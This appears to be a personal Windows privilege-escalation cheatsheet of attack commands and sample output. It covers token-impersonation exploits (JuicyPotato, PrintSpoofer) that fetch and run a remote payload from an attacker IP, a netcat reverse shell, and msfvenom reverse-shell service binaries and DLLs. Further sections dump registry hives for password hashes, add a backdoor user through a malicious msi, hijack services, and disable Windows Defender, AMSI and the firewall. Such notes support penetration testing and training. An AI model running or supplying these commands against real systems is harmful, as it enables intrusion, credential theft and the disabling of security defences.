this is my windows privilege escalation cheatsheet, gonna keep this growing and updated over time

basic enumeration

PS C:\> whoami
PS C:\> whoami /priv # exploitable privileges?
PS C:\> whoami /groups # administrator?

PS C:\> hostname
PS C:\> ipconfig /all ; route print ; arp -a # network information
PS C:\> netstat -anto | Select-String "listening" # check for services on loopback
PS C:\> netstat -anto | Select-String "established" # check outgoing connections
PS C:\> netsh advfirewall show allprofiles # firewall settings


PS C:\> Get-ChildItem 'Env:' | ft Key,Value # show environment variables


PS C:\> net user # get local users
PS C:\> net user /domain # get domain users
PS C:\> ls -force /Users/ # see home folders
PS C:\> ls -force / # check for interesting files or directories
PS C:\> tree /f /a \Users # check for interesting files
PS C:\> cat (get-psreadline).historysavepath # read powershell history


PS C:\> Get-Process # check running processes
PS C:\> tasklist /svc # check running processes
PS C:\> tasklist /v /fi "username eq system" # SYSTEM processes
PS C:\> Get-Service # check services


PS C:\> Get-PSDrive # check attached drives

whoami /all

PS C:\> whoami /all # see username, groups and privileges

USER INFORMATION
----------------

User Name            SID                                         
==================== ============================================
client\administrator S-1-5-21-524867371-2016665888-3240400722-500


GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                          Attributes                                                     
============================================= ================ ============================================ ===============================================================
Everyone                                      Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                        Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                 Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group             
CLIENT\Group Policy Creator Owners            Group            S-1-5-21-524867371-2016665888-3240400722-520 Mandatory group, Enabled by default, Enabled group             
CLIENT\Domain Admins                          Group            S-1-5-21-524867371-2016665888-3240400722-512 Mandatory group, Enabled by default, Enabled group             
CLIENT\Schema Admins                          Group            S-1-5-21-524867371-2016665888-3240400722-518 Mandatory group, Enabled by default, Enabled group             
CLIENT\Enterprise Admins                      Group            S-1-5-21-524867371-2016665888-3240400722-519 Mandatory group, Enabled by default, Enabled group             
CLIENT\Denied RODC Password Replication Group Alias            S-1-5-21-524867371-2016665888-3240400722-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level          Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

the interesting bits to watch out for are:

  • Mandatory Label\High Mandatory Level this means the current process is running with elevated privileges
  • BUILTIN\Administrators if we are in local administrator group
  • CLIENT\Domain Admins if our user is domain administrator

systeminfo

PS C:\> systeminfo
Host Name:                 DC04
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:           Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA955
Original Install Date:     4/16/2018, 12:09:40 AM
System Boot Time:          4/14/2021, 10:16:19 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,647 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,445 MB
Virtual Memory: In Use:    1,354 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    CLIENT.DOMAIN.COM
Logon Server:              N/A
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB3199986
                           [02]: KB4049065
                           [03]: KB4520724
                           [04]: KB4571694
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 172.16.4.5
                                 [02]: fe80::8975:cd87:5c81:1f7f
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

interesting things here:

  • OS Name: Microsoft Windows Server 2016 Standard and OS Version: 10.0.14393 N/A Build 14393 can be useful when searching for potential exploits

  • hotfixes

01: KB3199986
02: KB4049065
03: KB4520724
04: KB4571694 

hotfixes can be enumerated by checking microsoft securty bulletin (for example, windows-exploit-suggester tool can do this by ingesting systeminfo output)

  • System Type: x64-based PC is important information, since we might have to compile binaries for the system to run an exploit or upload tools like netcat, mimikatz and so on. those will need to match the architecture of the target.

common methods

user in local administrator group (UAC bypass)

see if your user is part of an administrative group

PS C:\> whoami /groups # in administrators group
GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                          Attributes                                                     
============================================= ================ ============================================ ===============================================================
Everyone                                      Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group             
user in local admin group  -----------> BUILTIN\Administrators                        Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                 Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group             
but medium integrity process -----------> Mandatory Label\Medium Mandatory Level          Label            S-1-16-12288 

check UAC (user account control):

# check if enabled
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Select-Object EnableLUA
EnableLUA
---------
        1


# check behavior 
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Select-Object ConsentPromptBehaviorAdmin
ConsentPromptBehaviorAdmin
--------------------------
                         5
# 0 -> no prompt
# 1 -> admin asked for password
# 2 -> UAC will always ask for confirmation to admin (on secure desktop)
# 3 -> like 1 
# 4 -> like 2
# 5 (default) -> will ask admin to confirm running non-windows binaries with high privileges


in such a situation it might be possible to bypass UAC, there are various exploits you can use depending on the exact windows version, but eventvwr and fodhelper are known well.

note that most UAC bypass exploits utilize DLL hijacking.

privileges

PS C:\> whoami /priv
PS C:\> whoami /groups # local admin?

see also microsoft docs about privileges and this amazing slide from andrea pierini

there are a lot of ways to abuse privileges, but the most common ones are:

  • SeImpersonatePrivilege // SeAssignPrimaryTokenPrivilege // SeCreateTokenPrivilege
  • SeBackupPrivilege // SeRestorePrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege

SeImpersonatePrivilege // SeAssignPrimaryTokenPrivilege // SeCreateTokenPrivilege

if you have a service account with SeImpersonatePrivilege enabled, you are system.

juicy potato

take a look at the original rotten potato paper

you can use juicy potato exploit to spawn a process as nt authority\system by token impersonation:

PS C:\> ./JuicyPotato.exe -t * -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "iex(iwr -uri 10.0.13.37/payload.ps1 -usebasicparsing)" -l 1337

printspoofer

works also on windows server 2019 with SeImpersonatePrivilege (while JuicyPotato does not)

PS C:\> ./PrintSpoofer64.exe -c "powershell iex(iwr -uri 10.0.13.37/payload.ps1 -usebasicparsing)"

SeBackupPrivilege // SeRestorePrivilege

gives you unfettered read/write access to the filesystem. this way we can read important files like the SAM, SECURITY and SYSTEM hives to extract user hashes.

PS C:\Windows\Temp> reg save HKLM\SAM SAM
PS C:\Windows\Temp> reg save HKLM\SYSTEM SYSTEM
PS C:\Windows\Temp> reg save HKLM\SECURITY SECURITY

and then transfer the saved hives on your machine to dump hashes:

$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8d1b3bcb293ec2bacf262ca05e9827c9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:19a3322455162a546ea115764e41817e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7025790b5bb6b1c87aff52f9fd307ce1:::
joe:1001:aad3b435b51404eeaad3b435b51404ee:45281a1a414c1b153240f4de7f92f1gd:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets    
[*] DPAPI_SYSTEM
dpapi_machinekey:0x74fc756809afe15e43878238324saf2a395e13d5
dpapi_userkey:0x3fc57e5af5f687620a96e594694dca9c1dd382d3         
 0000   0C EF 72 8A 43 7E B4 55  55 BE ED 92 C6 D9 01 11   ..r.C~.UU.......
 0010   DA 01 E1 C2 E3 83 93 D6  A9 B3 75 42 64 F6 43 86   ..........uBd.C.
 0020   4B 57 29 42 05 FF 94 D7  9E A9 44 9A DE 97 89 FB   KW)B......D.....
 0030   9E 0E A6 86 DB C9 2E 44  6E A7 08 29 D4 F4 FD 66   .......Dn..)...f             
[*]NL$KM:0cef728a434eb45555beed92c6d90111da01e1c2e38393d619b3754264f643864b57294205ff94d79ea9449ade9789fb9e0ea686dbc92e446ea70829d4f4f266
[*] Cleaning up...                     

SeLoadDriverPrivilege

also see Abusing SeLoadDriverPrivilege. you can load a vulnerable driver and exploit it to get code running in SYSTEM context

PS C:\> sc.exe create Capcom type="kernel" binPath="C:\Users\user\Desktop\Capcom.sys"
PS C:\> sc.exe start Capcom

SeTakeOwnershipPrivilege

allows you to take ownership of any object

PS C:\> takeown /f "C:\Program Files"
PS C:\> icacls.exe "C:\Program Files" /grant "$env:USER":F

and then you can modify the file as necessary to install malicious service.

credentials

search for clear text credentials

check these files for exposed credentials:


C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\sysprep\sysprep.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
C:\inetpub\wwwroot\web.config

they can be in different paths, so it might make sense to also search for them:

PS C:\> cmd /c dir /s /b sysprep.xml # search for sysprep.xml

also search file contents for ‘password’ or some other string:

PS C:\Users> findstr /spin "password" *.* # search all files with extensions
PS C:\Users> findstr /spin "secret" *.*
PS C:\Users> findstr /spin "password" *.txt *.ini *.config *.xml # search specific extensions

you should search inside Users or Program Files directory to reduce the amount of false positives

search the registry for passwords as well (can be a lot of entries here):

PS C:\> reg query HKLM /f password /t REG_SZ /s
PS C:\> reg query HKCU /f password /t REG_SZ /s

dpapi saved credentials


# credentials
PS C:\> ls -force $env:LOCALAPPDATA/Microsoft/Credentials/
PS C:\> ls -force $env:APPDATA/Microsoft/Credentials/
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a-hs-        4/29/2018   1:26 AM            422 45C236B9B8A454F3E4D0538A6F6C5842                            
-a-hs-        5/13/2018   4:28 PM            494 EBBFB3FE75D4A2D06163ED0DA58805FB  


# masterkeys (also check LOCALAPPDATA)
PS C:\> ls -force $env:APPDATA/Microsoft/Protect/
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d---s-        9/18/2020  11:33 AM                S-1-5-21-2291914956-3290296217-2402366952-1122              
-a-hs-        4/24/2018  12:03 AM             24 CREDHIST                      
-a-hs-        9/18/2020   6:03 PM             76 SYNCHIST  
PS C:\> ls -force $env:APPDATA/Microsoft/Protect/S-1-5-21-2291914956-3290296217-2402366952-1122
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a-hs-        9/18/2020  11:33 AM            740 3b7bc2e9-40f9-408d-82cd-b09e535fdce0                        
-a-hs-         6/4/2020   4:43 PM            740 4c2003e9-effc-4f96-a468-9b66acfa87a3                        
-a-hs-        4/24/2018  12:03 AM            900 BK-CORP                       
-a-hs-         6/4/2020   4:43 PM            740 d21c87da-fc2a-4d38-b14f-a8e47da3b7a9                        
-a-hs-         6/4/2020   4:43 PM            740 d9091ed6-ca04-4693-8fe3-77f0143318ea                        
-a-hs-        9/18/2020  11:33 AM             24 Preferred 

if you know the user password, you can decrypt the masterkeys using mimikatz (dpapi) and unlock the saved user credentials

recycle bin

# recycle bin is accessible over shell namespace 10
PS C:\> $shell = New-Object -com shell.application
PS C:\> $rbin = $shell.Namespace(10)
PS C:\> $items = $rbin.Items()
PS C:\> $items | select -first 2
PS C:\> $items[0] # or [1], [2], etc.

runas

if you already know the administrator password, you could just spawn a process

PS C:\> runas /env /noprofile /user:Administrator Password1 "C:\Windows\System32\cmd.exe"

pscredential

you can create a pscredential if you know a user’s password

PS C:\> $SecPasswd = ConvertTo-SecureString "Password1" -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential("Administrator", $SecPasswd)
PS C:\> $Computer = "DC01"
PS C:\> [System.Diagnostics.Process]::Start("C:\temp\nc.exe 10.0.13.37 1337 -e cmd", $Cred.Username, $Cred.Password, $Computer)

misconfigurations

insecure permissions

look for files and programs with insecure permissions using accesschk.exe from Windows Sysinternals

# show effective access of current user

# -u suppress errors
# -s recurse
# -w show only writable
PS C:\> ./accesschk.exe -accepteula -wsu C:\*.* 

# weak directory permissions, writable dirs
PS C:\> ./accesschk.exe -accepteula -wsud "Everyone" C:\*.*
PS C:\> ./accesschk.exe -accepteula -wsud "Users" C:\*.*
PS C:\> ./accesschk.exe -accepteula -wsud "Authenticated Users" C:\*.*

# -c check services permissions (use * for all)
PS C:\> ./accesschk.exe -accepteula -wsuc * # current user
PS C:\> ./accesschk.exe -accepteula -wsuc "Everyone" * 
PS C:\> ./accesschk.exe -accepteula -wsuc "Authenticated Users" *

these can then be overwritten with malicious executables or dll. malicious code is executed when the service is restarted (reboot can also work).

also check for file permissions using icacls:

PS C:\> icacls "C:\Program Files\*" | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
PS C:\> icacls "C:\Program Files (x86)\*" | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
PS C:\Program Files\> icacls.exe * | findstr "(F)" # full access
PS C:\Program Files\> icacls.exe * | findstr "(M)" # modify access

always install elevated

check if AlwaysInstallElevated is set to 1:

PS C:\> Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
PS C:\> Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer

if this value is set, you can create an msi package and install it with elevated privileges

$ msfvenom -p windows/adduser USER=hacker PASS=evil -f msi -o evil.msi
$ msfvenom -p windows/adduser USER=hacker PASS=evil -f msi-nouac -o evil.msi
PS C:\> msiexec /quiet /qn /i C:\Windows\Temp\evil.msi

service manipulation

you can look for:

  • modifiable service
  • writable service executable
  • unquoted service path
  • hijackable dll

in most cases if any of those are present, you can get code execution as that service’s user (usually SYSTEM). as you can imagine, this goes hand in hand with insecure permissions :)

# show services
PS C:\> Get-Service

# get list of all service names
PS C:\> sc.exe query | select-string service_name 

# check the configuration of a specific service
PS C:\> sc.exe qc <ServiceName> 

# check permissions for specific service
PS C:\> sc.exe sdshow <ServiceName>

# get executable path for all processes
PS C:\> wmic process list full | select-string 'executablepath=C:' 
PS C:\> wmic process list full | select-string 'executablepath=C:' | select-string -notmatch 'system32|syswow'

once you found a vulnerable service, you could escalate by changing for example the binPath attribute:

create a malicious service executable:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.13.37 LPORT=1337 -f exe-service -o shell_svc.exe
# CVE-2019-1322 UsoSvc - Windows 10
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config UsoSvc binPath="C:\Windows\System32\spool\drivers\color\shell_svc.exe"
PS C:\Windows\system32> sc.exe qc UsoSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\spool\drivers\color\shell_svc.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

PS C:\Windows\system32> sc.exe start UsoSvc


# upnphost on Windows XP
C:\> sc.exe config upnphost binpath= "C:\Windows\System32\spool\drivers\color\shell_svc.exe"
C:\> sc.exe config upnphost obj= ".\LocalSystem" password= ""
C:\> sc.exe qc upnphost
C:\> sc.exe config upnphost depend= ""
C:\> sc.exe start upnphost

unquoted paths

if the path to an executable doesn’t have quotes around it, windows will try to execute every ending before a space. for example, if the path is C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe (i’m referring to this exploit) then windows will try executing:

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\IObit\IObit.exe
C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe

we can take advantage of this behavior if we have write privileges to C:\Program Files (x86)\IObit\

# check for unquoted paths in services
PS C:\> wmic service get name,pathname | select-string -notmatch '"|^$'
PS C:\> wmic service get name,displayname,pathname,startmode | select-string -notmatch 'C:\\Windows|"|^$'

# check only non-windows services
PS C:\> wmic service get name,displayname,pathname,startmode | select-string -notmatch 'C:\\Windows|"|^$'

# check only auto started services
PS C:\> wmic service get name,displayname,pathname,startmode | select-string "auto" | select-string -notmatch 'C:\\Windows|"|^$'

if any of the paths don’t have quote around them and have spaces in it, check if you can write to the unquoted path (icacls)

dll hijacking

when a windows process wants to load a dll file, it goes through the following to search for it:

  • directory where process was launched
  • C:\Windows\System32
  • C:\Windows\System
  • C:\Windows\
  • current working directory
  • directories in order from system PATH
  • directories in order from user PATH

so if you can do any of:

  • writing in a system folder
  • writing to a non-default program install directory (f.e., C:\Python27)
  • restart a service running as SYSTEM (a missing dll can be identified using procmon)

then you can get SYSTEM privileges by loading a malicious dll.

to check for privileges use icacls

create malicious dll:

$ msfvenom -p windows/reverse_shell_tcp LHOST=10.0.13.37 LPORT=1337 -f dll -o malicious.dll

scheduled tasks

check scheduled tasks for anything interesting

PS C:\> schtasks /query /fo LIST
PS C:\> Get-ScheduledTask

startup

check startup programs for anything out of the ordinary

PS C:\> wmic startup
PS C:\> wmic startup get caption,command
PS C:\> Get-ChildItem "C:\Users\*\Start Menu\Programs\Startup" # check all users startup dirs

exploits

vulnerable software

get a list of installed software on the machine:

PS C:\> get-package | select-object name,version # will list installed software and versions
PS C:\> Get-ChildItem HKLM:\SOFTWARE | ft Name # check the registry too
PS C:\> ls -force -Path 'C:\Program Files*\*' | ft Parent,Name,LastWriteTime # also the program directories

the list can then be cross-checked against exploit-db, and look for local privilege escalation vulnerabilities like unquoted paths or insecure permissions.

vulnerable drivers

check if any vulnerable drivers are installed. since they run in SYSTEM context, they can be a good target for exploitation.

PS C:\> driveryquery # get a list of installed drivers
PS C:\> driverquery /v /fo csv | ConvertFrom-CSV | Select-Object 'Module Name' | fl
PS C:\> driverquery /v /fo csv | ConvertFrom-CSV | Select-Object 'Module Name', 'Display Name', 'Start Mode', 'Path' | fL
PS C:\> DriverQuery.exe --no-msft # OffensiveCSharp DriverQuery
[+] Enumerating driver services...
[+] Checking file signatures...
Intel(R) Serial IO GPIO Controller Driver
Service Name: iaLPSSi_GPIO
	Path: C:\Windows\System32\drivers\iaLPSSi_GPIO.sys
	Version: 1.1.250.0
	Creation Time (UTC): 7/16/2016 1:18:02 PM          
    Cert Issuer: CN=Intel External Basic Issuing CA 3B, O=Intel Corporation, L=Santa Clara, S=CA, C=US
	Signer: CN=Intel Corporation - Client Components Group, O=Intel Corporation, L=Santa Clara, S=CA, C=US  

PS C:\> DriverQuery.exe --no-msft | select-string 'name|version|^$' # get name/version list
   Service Name: iaLPSSi_GPIO
    Version: 1.1.250.0

    Service Name: pvscsi
    Version: 1.3.15.0

    Service Name: vm3dmp
    Version: 8.16.01.0024

    Service Name: vm3dmp-debug
    Version: 8.16.01.0024

    Service Name: vm3dmp-stats
    Version: 8.16.01.0024

    Service Name: vm3dmp_loader
    Version: 8.16.01.0024

    Service Name: vmci
    Version: 9.8.16.0

    Service Name: VMMemCtl
    Version: 7.4.2.0

    Service Name: vmmouse
    Version: 12.5.7.0

    Service Name: vmusbmouse
    Version: 12.5.4.0

    Service Name: vsock
    Version: 9.8.16.0

windows kernel exploits

PS C:\> systeminfo | Select-String "os name|os version|system type"
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
System Type:               x64-based PC
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
PS C:\> wmic qfe get HotFixID
HotFixID
KB3199986
KB4049065
KB4520724
KB4571694

then use searchsploit, or search online for an exploit based on these. for example search from this could be:

windows server 2016 "10.0.14393" exploit
KB4571694 site:microsoft.com

also check the following resources:

antivirus and other mitigations

windows defender

# see if windows defender is running
PS C:\> Get-Service windefend
Status   Name               DisplayName                           
------   ----               -----------                           
Running  windefend          Windows Defender Service              


# check status
PS C:\> Get-MpComputerStatus | findstr /i "disabled enabled"
AMServiceEnabled                : True
AntispywareEnabled              : True
AntivirusEnabled                : True
BehaviorMonitorEnabled          : True
IoavProtectionEnabled           : True
NISEnabled                      : True
OnAccessProtectionEnabled       : True
RealTimeProtectionEnabled       : True

# check preferences
PS C:\> Get-MpPreference | findstr /i "disable enable scan" | findstr /i "true false"
CheckForSignaturesBeforeRunningScan           : False
DisableArchiveScanning                        : False
DisableAutoExclusions                         : False
DisableBehaviorMonitoring                     : False
DisableBlockAtFirstSeen                       : False
DisableCatchupFullScan                        : True
DisableCatchupQuickScan                       : True
DisableDatagramProcessing                     : False
DisableEmailScanning                          : True
DisableIOAVProtection                         : False
DisablePrivacyMode                            : False
DisableRealtimeMonitoring                     : False
DisableRemovableDriveScanning                 : True
DisableRestorePoint                           : True
DisableScanningMappedNetworkDrivesForFullScan : True
DisableScanningNetworkFiles                   : False
DisableScriptScanning                         : False
EnableFileHashComputation                     : False
EnableLowCpuPriority                          : False
ScanOnlyIfIdleEnabled                         : True
SignatureDisableUpdateOnStartupWithoutEngine  : False


# disable AMSI (can get access denied)
PS C:\> Set-MpPreference -DisableScriptScanning $true
PS C:\> Get-MpPreference | findstr /i "scanning"
DisableArchiveScanning                        : False
DisableEmailScanning                          : True
DisableRemovableDriveScanning                 : True
DisableScanningMappedNetworkDrivesForFullScan : True
DisableScanningNetworkFiles                   : False
DisableScriptScanning                         : True



# disable realtime monitoring (can get access denied)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true # change to $false to re-enable
PS C:\> Get-MpComputerStatus | findstr /i "disabled enabled"
AMServiceEnabled                : True
AntispywareEnabled              : True
AntivirusEnabled                : True
BehaviorMonitorEnabled          : False
IoavProtectionEnabled           : False
NISEnabled                      : False
OnAccessProtectionEnabled       : False
RealTimeProtectionEnabled       : False


# add excluded path
PS C:\> Add-MpPreference -ExclusionPath "C:\Users\joe"

firewall

# check if firewall is enabled
PS C:\> netsh advfirewall show allprofiles | Select-String "profile|state|policy"
Domain Profile Settings: 
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
Private Profile Settings: 
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
Public Profile Settings: 
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound


# disable it (might get access denied)
PS C:\> netsh advfirewall set allprofiles state off
PS C:\> netsh advfirewall show allprofiles | Select-String "profile|state|policy"
Domain Profile Settings: 
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound
Private Profile Settings: 
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound
Public Profile Settings: 
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound

applocker

# see applocker rules
PS C:\> Get-AppLockerPolicy -Effective
PS C:\> Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections

since everything under C:\Windows\ is allowed by default, with basic settings it can be bypassed trivially by using common writable directories:

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public

tools

Windows SysInternals

OffensiveCSharp

LOLBAS

wesng